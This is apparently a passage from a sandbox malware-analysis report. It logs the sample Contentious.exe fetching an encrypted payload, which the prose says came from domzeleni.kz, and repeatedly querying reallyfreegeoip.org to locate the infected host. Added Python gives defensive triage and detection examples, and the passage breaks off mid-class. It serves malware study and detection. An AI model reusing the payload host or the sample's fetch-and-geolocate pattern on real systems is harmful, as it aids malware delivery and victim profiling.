                                           2024-07-25 07:56:41 UTC | 16043 | IN | Data Raw: dd bb b6 79 c9 42 8f be ec 79 9e e2 ee 50 2c 1f 53 3a e3 f4 85 a2 f1 17 60 e2 ce 6e 62 ee 58 09 95 64 57 8f 5d 37 fb 34 30 f7 ab 27 46 79 51 f5 ed ff 89 11 8c 45 bf 97 14 1c fc 32 14 1f f4 01 3d 50 ad 91 33 93 f9 c3 3e b5 09 13 8a 1c 19 84 0a 5a 79 93 eb 83 67 5d 30 b2 c5 b8 65 02 cd 1d fd b8 2f 16 59 4e a1 94 70 42 5a d6 4e 60 c6 79 1f 52 3e 78 39 ad 0d 1f fe 1d b5 48 2d d8 53 47 ac d6 02 68 76 ee e9 2e e2 1d cc 9f cd 51 ff 8c 0c a6 bb 50 c4 66 e4 f2 fd c7 29 89 01 65 51 14 a6 c0 aa 17 3e 10 de f8 85 91 9c f5 e9 8c 87 f1 ad c7 ef 8d a7 6b 63 d6 c8 8c 2b 40 36 6a e9 8f 6e 27 7f 65 b5 89 0b 88 e4 5d 18 24 db 25 a6 ff 9a a2 74 50 00 ec d1 d1 b8 10 a0 1b 27 9e db 1b d0 b0 ac 48 b9 0d a1 91 05 1c 5b f2 4c e7 91 74 cc a2 dd 2d 81 ac b6 d8 83 bf d5 d9 21 54 b8
                                          Data Ascii: yByP,S:`nbXdW]740'FyQE2=P3>Zyg]0e/YNpBZN`yR>x9H-SGhv.QPf)eQ>kc+@6jn'e]$%tP'H[Lt-!T
                                           2024-07-25 07:56:41 UTC | 16384 | IN | Data Raw: 9d 43 13 75 e9 bb 90 a6 4e 51 24 eb 83 6d 29 f4 b2 c5 b9 6e 02 ca 6f ae af 2f 66 36 f6 a1 94 7a 42 5d a8 65 60 c6 7d 61 7e 3e 78 3d de b4 1f fe 17 da f2 ad d8 59 47 8a 4b b8 66 7c 47 6d a3 c3 a5 cc f6 16 02 f8 f8 65 a5 39 05 a1 21 32 80 9c a0 ab cf 78 79 70 6d d2 90 6a 57 07 1c 8e 96 a5 fc 50 f0 b7 b1 5a d3 c0 d8 29 cd 92 18 65 dc ec 88 89 65 2a 18 b6 93 3e 12 dd 4d 82 88 08 82 43 51 8f 42 df 0d e5 ff 9a a4 1b 28 e0 ec d9 dc b4 19 7e 72 4d 05 61 1b d0 ae ac 48 be 62 1d 91 bb 04 54 fb 44 d1 99 fa a5 ed 62 2d 81 a6 f6 d1 ec ff d5 d9 2b 56 66 80 40 03 bc 3f 5b de cd 82 0b 25 be de 7e 3b 9d ba 58 92 36 47 e0 ab 97 2d 3f ab 2a 0d 7d 09 77 a5 9f a4 61 f7 fa fc af 4b 68 e4 71 03 c0 4b 27 e1 42 b6 3f 9c 25 02 eb 45 36 32 8f b5 7f 1d 2b e1 6c 10 32 49 dc 0f c5 1b
                                          Data Ascii: CuNQ$m)no/f6zB]e`}a~>x=YGKf|Gme9!2xypmjWPZ)ee*>MCQB(~rMaHbTDb-+Vf@?[%~;X6G-?*}waKhqK'B?%E62+l2I
                                           2024-07-25 07:56:42 UTC | 16384 | IN | Data Raw: a6 d0 f0 91 14 b8 f6 e1 1d 11 c8 55 cd d5 fa 86 9e 71 6a 68 74 69 c2 56 6c aa 64 09 6d b7 e2 c0 ef 29 71 60 83 89 55 46 4d 0d 76 07 08 bb 18 7c e4 d8 00 1c d4 ba dc e6 87 1d c0 aa e5 a0 35 01 82 02 21 96 99 3d 0c 95 8e b0 96 b8 0a 5b b0 8e 93 fe 2d 79 a0 91 20 c4 4d cf 2d 34 2b 16 ba 25 2d 2e 5d f3 be d4 f9 8a 22 21 f0 ba c7 03 9e 0a 7e 70 98 f0 2d c7 b1 6e f2 4a c6 f0 4a 31 8b 05 a8 d0 61 9a 4a cc d0 a0 1f 0e d7 58 a9 6a e0 ed a6 eb 20 69 b0 50 e4 99 ff bc 76 59 de e0 6f 97 13 21 6e 67 59 50 35 ed b7 b9 a3 3e 78 ce 1a 14 d3 4c 82 e5 46 07 cf 30 27 c3 26 5b 61 7e cc 46 5c ef ff b9 06 5f 29 2c d0 f9 d2 78 a7 21 3a 87 e0 ae 7b 4e 86 11 cc 47 7b 1b a8 81 4d 4e dc c8 10 a4 84 a0 96 91 b3 31 93 38 0e 39 4c 7d d3 17 2c e3 c1 a7 47 3c 35 c4 7c 9c 4b 37 7d 05 84
                                          Data Ascii: UqjhtiVldm)q`UFMv|5!=[-y M-4+%-.]"!~p-nJJ1aJXj iPvYo!ngYP5>xLF0'&[a~F\_),x!:{NG{MN189L},G<5|K7}
                                           2024-07-25 07:56:42 UTC | 16384 | IN | Data Raw: e6 e6 5b e3 f6 27 cb 18 72 50 07 bc af 59 01 f3 bb eb 8a d7 65 98 1f f3 43 dc a9 34 11 d7 ea b7 b1 aa f0 63 d2 57 d0 57 c6 d7 23 72 ab 5c 33 c7 7c 5a 06 ae 4c 3e 9e 74 72 11 4b 3c a2 5f e9 75 fe 59 c6 be 83 41 96 df ef 8b 6b 58 39 1b 75 47 a7 52 10 33 6c d9 b3 28 ae 05 d3 ee 4b e5 bf f4 81 fe 22 81 3a dd e3 fe 07 a5 be 5a 59 44 c9 e5 b9 92 b5 69 f4 6d ce 7b 7f d6 3c 28 ba 67 73 98 a2 0a ca 36 1d bd 36 ba 07 f9 3a 06 48 c5 0e a0 98 51 d2 b7 ad a1 16 4e ce 45 1d 14 db ef dc c9 5e 1a 86 c4 9e c8 f0 a3 82 12 45 96 bb 55 bd 50 64 80 3a c9 7a 35 99 ed 8a 60 b7 72 a8 be 9e 49 ba 1b f8 d5 ae ad f2 03 48 f5 03 9c 81 26 a2 0f a2 0c 97 db 72 7c 8e 83 02 78 80 c0 e8 9a b7 bf f1 90 95 85 e1 19 b8 ff d1 f1 cd 85 b8 76 25 f0 1b 6b c5 ec d2 0b 65 4b f2 5a 1a 27 b3 48 d8
                                          Data Ascii: ['rPYeC4cWW#r\3|ZL>trK<_uYAkX9uGR3l(K":ZYDim{<(gs66:HQNE^EUPd:z5`rIH&r|xv%keKZ'H
                                           2024-07-25 07:56:42 UTC | 16384 | IN | Data Raw: 5e d2 42 35 db 2f ed 5a 61 ff 3a 66 1e 71 98 76 da da 4a ea 86 64 70 33 16 37 c7 e0 7b b1 22 5b 80 1e 81 72 85 15 38 17 1d 25 3b 92 65 f1 f3 39 99 b4 97 4c b2 30 fb f7 4e cf 49 08 40 95 f2 71 47 a4 02 16 2b b2 e1 22 70 a3 7f d6 b3 ec 83 7b 74 13 bd aa 63 d1 08 ce c0 74 19 4c 6e 6d ef d6 6a f5 4c 7c b3 68 dc 80 9c 5c c2 59 ca 22 cb 88 c9 8a 11 90 61 f5 46 f7 dd e6 f9 90 69 c0 c2 8d f9 e2 68 33 12 23 9f c8 05 0f 23 4a d9 38 e1 5f 45 20 10 3d 3b 2d 6e a4 f5 4e 9a 0d e8 be 40 bb 15 90 2f 64 6e 58 b7 fe bc c5 53 17 c1 f7 ec 7f d7 4e d9 de 37 e9 76 39 99 e3 3c 7c 5b 16 02 69 8e 15 d7 fe 9c 29 b2 2a c4 61 db 09 86 f0 5d 4e 56 01 79 0c d9 15 6b 48 a8 7a a1 ef 77 0e 90 64 0e ac 9e 7f 56 3b 6c da 0e 77 82 c9 16 3f 35 bf bb 66 32 7e 5e 4f eb 28 d1 07 6d b7 f4 ae 33
                                          Data Ascii: ^B5/Za:fqvJdp37{"[r8%;e9L0NI@qG+"p{tctLnmjL|h\Y"aFih3##J8_E =;-nN@/dnXSN7v9<|[i)*a]NVykHzwdV;lw?5f2~^O(m3
                                           2024-07-25 07:56:42 UTC | 16384 | IN | Data Raw: 76 5b e0 aa c2 f4 cd d1 00 3a aa b7 65 d4 9b 6b b7 5a 83 82 9c e6 08 bf 60 0a 3f 36 d3 b5 c8 70 1e 2c aa c1 a5 f9 f2 9a ac 94 d4 d3 c0 f8 8a b1 89 67 6e 8d ed d5 2b 42 36 06 e8 d4 3e 63 7f 08 f8 d3 08 8a 3d 1e 8e 1f db 24 a6 90 9b ff 74 52 e0 9c d2 8f b3 10 f0 6a 26 35 da 15 d0 e8 ad 4b b9 1e a1 e5 ba 0d 59 f0 4d e0 84 4a d9 99 de 65 94 9e e3 c2 96 13 dd 4a 29 cc b0 2d 48 a2 98 ed 5a 89 c5 bd 02 b2 b2 bc ad d1 b6 d8 63 c9 39 26 e0 1b 84 ba 7f 75 39 89 b4 1d 67 e6 9e d7 61 0a 85 e4 af 08 6d e3 2c a6 df 3a 31 8a 15 c1 3f a6 37 fd ea 56 32 e0 8a 28 ba 1d 2b e1 13 c9 32 2c fb 7f b4 4c 78 79 15 8e 35 40 f7 c9 b0 e7 78 45 ac 6c ef 51 5a eb 54 6a 2e ec 49 7e bd e8 a6 57 da fe 91 56 13 f3 a1 0f 6e 95 16 5e cb 57 32 c6 bb ec 13 15 55 80 fd 4e 42 31 e4 cb cf 4d 54
                                          Data Ascii: v[:ekZ`?6p,gn+B6>c=$tRj&5KYMJeJ)-HZc9&u9gam,:1?7V2(+2,Lxy5@xElQZTj.I~WVn^W2UNB1MT
                                           2024-07-25 07:56:42 UTC | 16384 | IN | Data Raw: 0f 19 15 99 0b 7b 43 9d 47 05 f9 be 5b 3d 3c 92 07 b7 51 6f 2b 13 38 80 bc 19 4a 8d 03 3e 72 2d f7 8a f0 1a 95 f8 bc b6 57 79 80 44 8a f4 83 2b 10 6e 9d 6b ae e1 a0 38 f1 c6 5d 66 d5 51 84 62 1b 1a de 34 be bb 1d c9 41 e3 62 5e 72 ba 91 7e cd ff 85 5f 5a 5f aa 9e b1 2e fc 61 77 40 71 60 bd 2f 25 e9 cf cb 76 82 87 f7 5c cb 5e 26 31 21 79 92 04 b0 fa 49 e7 f0 b7 ca 21 7a 01 c0 7f c0 46 f9 66 d5 43 d3 00 31 b6 e1 ed d7 97 cf dc bc e5 5c b8 59 34 e9 64 df e2 83 40 54 f3 af a2 33 3c fe 47 1b 0c ad a4 6f 00 27 39 0c e2 09 f3 b4 db db 89 d3 fa b5 ff 19 02 82 8b fa 6f 82 24 e1 e1 a6 aa 57 0d 3a fb 2e f0 f6 e5 05 c4 35 84 0b cd b7 1a 77 cd 28 e8 de c9 0d 52 39 5f c1 45 df cc 5f 69 db 46 83 2c 40 aa 20 bc f4 88 48 d2 36 5a 15 20 59 7c 84 54 3f 27 8b 85 2d 25 81 cd
                                          Data Ascii: {CG[=<Qo+8J>r-WyD+nk8]fQb4Ab^r~_Z_.aw@q`/%v\^&1!yI!zFfC1\Y4d@T3<Go'9o$W:.5w(R9_E_iF,@ H6Z Y|T?'-%
                                           2024-07-25 07:56:42 UTC | 16384 | IN | Data Raw: 7c f4 2d e9 10 e8 ca c5 c6 b1 46 bb b3 ef f6 7d 7a 6f 53 75 22 b1 df 13 18 7f d4 a2 3f 82 4a 9b 3f 0b a2 bf 9d a4 87 50 bc 6a a9 93 1e 22 c0 af 24 fb 16 d1 e4 e6 ba b5 6b 56 14 d7 3f 65 07 19 57 c8 6c 3e b8 d2 ec ef 4c 0c fb 94 fe 1b d7 9f 0f 48 d0 ac ee e3 30 d2 c8 be f5 68 31 ce 19 19 49 e3 a8 95 ae 5e 79 06 a1 9e e8 f4 e7 82 62 42 f5 6d 27 ba 41 1a 9c 3c fd bc e4 66 3f 8a 4d 69 4f 8d bb aa 64 ba 3c eb c1 ae a5 a1 50 48 91 dd fd 81 67 a2 6a a2 6d 8b 8f 72 0e 8e e2 02 08 80 ab e8 3b b4 cd f1 67 96 a8 e1 24 b8 d2 d1 99 cd a8 b9 40 15 d8 1b a4 c5 e1 d2 4a 65 0d e3 35 68 7f b2 26 a8 f4 da d8 ce 8d 4d b3 89 19 66 2d bf 04 b1 16 55 0e 45 46 ad 4c c2 94 63 93 c4 e5 3d 48 06 2e 1c 97 fe a6 5c 3f cd 6d c1 4d c3 25 26 ae 69 6e 7b bb 4a 4a 77 c8 22 6f fe ba ec 19
                                          Data Ascii: |-F}zoSu"?J?Pj"$kV?eWl>LH0h1I^ybBm'A<f?MiOd<PHgjmr;g$@Je5h&Mf-UEFLc=H.\?mM%&in{JJw"o
                                           2024-07-25 07:56:42 UTC | 2965 | IN | Data Raw: 1f 19 f6 98 28 e7 c1 71 68 5d f2 a0 74 35 d2 07 b5 c5 9e e6 23 28 0f a7 a2 96 f1 28 f8 fc 22 6d 0a 37 18 97 b2 00 de 41 5d dd 59 f1 87 3d 2e b7 20 ad 4d b4 c8 8a b3 0d 8b 7f ea 66 fc db 94 84 d5 cc a1 b6 ee 88 ac 15 7d 4a 5d ae a2 7b 76 4d 12 c2 0b 87 05 fe 1a 63 54 40 60 12 ed aa 64 e6 77 98 d9 2f e3 68 e7 4f 61 d8 37 da ce cc 83 2f 4e 8c 86 94 09 ad 37 b0 d4 d3 c7 00 0c aa c8 43 05 27 36 52 61 fb 74 a7 84 d8 13 d0 4b b6 67 3f 66 b8 f7 57 7f 63 53 d4 70 f9 59 62 2c 85 5a ea e7 48 66 e3 16 ae 5f f8 5f 26 2d 94 fa 59 1a 92 31 79 48 42 f0 46 02 40 07 37 5e 19 5b f1 77 77 77 dc 8e 37 a3 f9 51 23 6d 7b c0 c6 5e 0d e5 65 89 3c df d0 11 ad 26 7e e8 e7 30 0b b4 6a 66 68 d1 4c 15 2a cd 03 39 9c 46 c5 75 e0 f8 e5 17 6c e8 c5 2b 97 24 bb 9b 74 3f 44 83 0d 1e 19 46
                                          Data Ascii: (qh]t5#(("m7A]Y=. Mf}J]{vMcT@`dw/hOa7/N7C'6RatKg?fWcSpYb,ZHf__&-Y1yHBF@7^[www7Q#m{^e<&~0jfhL*9Ful+$t?DF


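The session above is the download of /image/bwSNbczRiJIuD15.bin from domzeleni.kz by Contentious.exe. The report prints only the first bytes of each received chunk, but the chunk sizes it lists (16043 + 7 × 16384 + 2965) add up exactly to the advertised Content-Length of 133696, and the first bytes of the payload (dd bb b6 79 ...) are not an MZ header, so what came back is not a plain PE file. The following is an added example, not Joe Sandbox code and not part of the sample, that reassembles the "Data Raw" rows of such a session dump into one buffer and applies the two checks an analyst does first on a fetched blob: does it start with a PE header, and how random does it look. The constructed input embeds only the first 64 payload bytes of the first chunk; the function names and the layout of the triage dictionary are this example's own design.

```python
import math
import re

# Constructed excerpt of a sandbox HTTP session dump, shaped like the report above:
# response headers, then "Data Raw:" rows of space-separated hex bytes. Only the
# first 64 payload bytes of the page's first chunk are reproduced here.
SAMPLE_SESSION = """\
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/octet-stream
Content-Length: 133696
Connection: close
2024-07-25 07:56:41 UTC16043INData Raw: dd bb b6 79 c9 42 8f be ec 79 9e e2 ee 50 2c 1f 53 3a e3 f4 85 a2 f1 17 60 e2 ce 6e 62 ee 58 09 95 64 57 8f 5d 37 fb 34 30 f7 ab 27 46 79 51 f5 ed ff 89 11 8c 45 bf 97 14 1c fc 32 14 1f f4 01
Data Ascii: yByP,S:`nbX
"""

# "Data Raw:" followed by hex byte pairs up to the end of the line; the row prefix
# (timestamp, byte count, direction) is ignored, so flattened and tabular rows both parse.
DATA_RAW_RE = re.compile(r"Data Raw:\s*((?:[0-9a-fA-F]{2}\s*)+)$")
CONTENT_LENGTH_RE = re.compile(r"^\s*Content-Length:\s*(\d+)", re.M)


def reassemble(dump: str) -> bytes:
    """Concatenate every 'Data Raw:' row of a session dump, in order, into one buffer."""
    chunks = []
    for line in dump.splitlines():
        m = DATA_RAW_RE.search(line)
        if m:
            chunks.append(bytes.fromhex(m.group(1).replace(" ", "")))
    return b"".join(chunks)


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty or constant input, 8.0 is the maximum)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_like_pe(data: bytes) -> bool:
    """True when the buffer starts with the DOS 'MZ' magic of a Windows executable."""
    return data[:2] == b"MZ"


def triage(dump: str) -> dict:
    """Reassemble the payload seen in a dump and summarise what an analyst checks first."""
    payload = reassemble(dump)
    m = CONTENT_LENGTH_RE.search(dump)
    expected = int(m.group(1)) if m else None
    return {
        "bytes_seen": len(payload),
        "content_length": expected,
        # True only when the dump carried the whole body, which a truncated report never does.
        "complete": expected is not None and len(payload) == expected,
        "is_pe": looks_like_pe(payload),
        "entropy": round(shannon_entropy(payload), 2),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_SESSION))
```

On the 64-byte sample the entropy estimate is capped at log2(64) = 6 bits, so treat the number as a sanity check only; run the same function over the full 16 KiB chunks from a pcap to get a figure worth comparing against the 7.9+ bits that encrypted or compressed data typically shows.
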
                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           1 | 192.168.2.4 | 49738 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           2024-07-25 07:56:45 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                           2024-07-25 07:56:45 UTC | 706 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:45 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22928
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2s6HZvNveDZLCWoTWwnk4UNTYhMlSSSiHV4PKoVo%2BNHwu3OuXK4r%2Bf0XIzAYt88YxxlXAmwZa4Jf8o%2FpUFH2T08nvtP25QhWNOF0CCVNmGJ7zjMSpQ1ODPAaIrXifaSPtEwUNbzt"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a9861ff7c1885-EWR
                                          alt-svc: h3=":443"; ma=86400
                                           2024-07-25 07:56:45 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                           2024-07-25 07:56:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           2 | 192.168.2.4 | 49739 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           2024-07-25 07:56:47 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                           2024-07-25 07:56:47 UTC | 710 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:47 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22930
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ClLRaZdr9LAVI9xue%2BwdYi0RiM1CoGuj1mWlJvyAv7d7YW7M89xPNQ6SNqGVzKY5Uwbgrr2%2Bu5yq%2FdRGDcUyr4DyjNs23hnGSvciE%2FR4pJrGfTq7Oyh7KJcUGUw%2FXtuEnrWv8113"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a986e6acb43a4-EWR
                                          alt-svc: h3=":443"; ma=86400
                                           2024-07-25 07:56:47 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                           2024-07-25 07:56:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           3 | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           2024-07-25 07:56:50 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                           2024-07-25 07:56:51 UTC | 704 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:50 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22933
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MlbW34TTGINwz%2BTPygNna6fXiEkdpbSNWVHp7xEWuTcxSp2CdExtAIcgffubmdBTRa70zRKHcjbuQS%2Fy1ZInoXzaA4AgM8qH7R2Tf6QN42KnIxAMMhRnf3IoTKRnlymqZLYOECDU"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a988298021a3c-EWR
                                          alt-svc: h3=":443"; ma=86400
                                           2024-07-25 07:56:51 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                           2024-07-25 07:56:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                           4 | 192.168.2.4 | 49744 | 188.114.96.3 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\Contentious.exe
                                           Timestamp | Bytes transferred | Direction | Data
                                           2024-07-25 07:56:53 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                           2024-07-25 07:56:53 UTC | 706 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 25 Jul 2024 07:56:53 GMT
                                          Content-Type: application/xml
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          access-control-allow-origin: *
                                          vary: Accept-Encoding
                                          Cache-Control: max-age=86400
                                          CF-Cache-Status: HIT
                                          Age: 22936
                                          Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JTqAEpWvz1YS8Tit2UiIZVN8y8M0EifKHEIYuY0C4rkMjigg2Q45ALCMAgIL%2F0hnUZ0khaiBGLC8BBtjj2HdsVf6oz6FH6WTUwg0VOTuBkkQiwqxflIfuO3qMQIe%2F%2Bf4EQXGmCj6"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8a8a98928ec642e2-EWR
                                          alt-svc: h3=":443"; ma=86400
                                           2024-07-25 07:56:53 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                          Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                           2024-07-25 07:56:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


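Across the sessions above the same process (PID 7972, Contentious.exe) alternates between asking checkip.dyndns.org for its public address and then requesting /xml/<that address> from reallyfreegeoip.org, which returns the country code of the analysis machine; the pair repeats every couple of seconds. The following is an added detection example, not part of the report and not code from the sample, that runs exactly that correlation over proxy-style HTTP events: it learns the address from the checkip response body and flags a later geolocation lookup of the same address by the same process inside a short window, which separates this behaviour from a user who happens to visit one of the sites. The HttpEvent schema, the 60-second window and the event list (built from the timestamps, PID and response bodies shown on this page) are this example's own assumptions.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class HttpEvent:
    """One HTTP request from a proxy or sandbox log; body is the response body if captured."""
    ts: datetime
    pid: int
    host: str
    path: str
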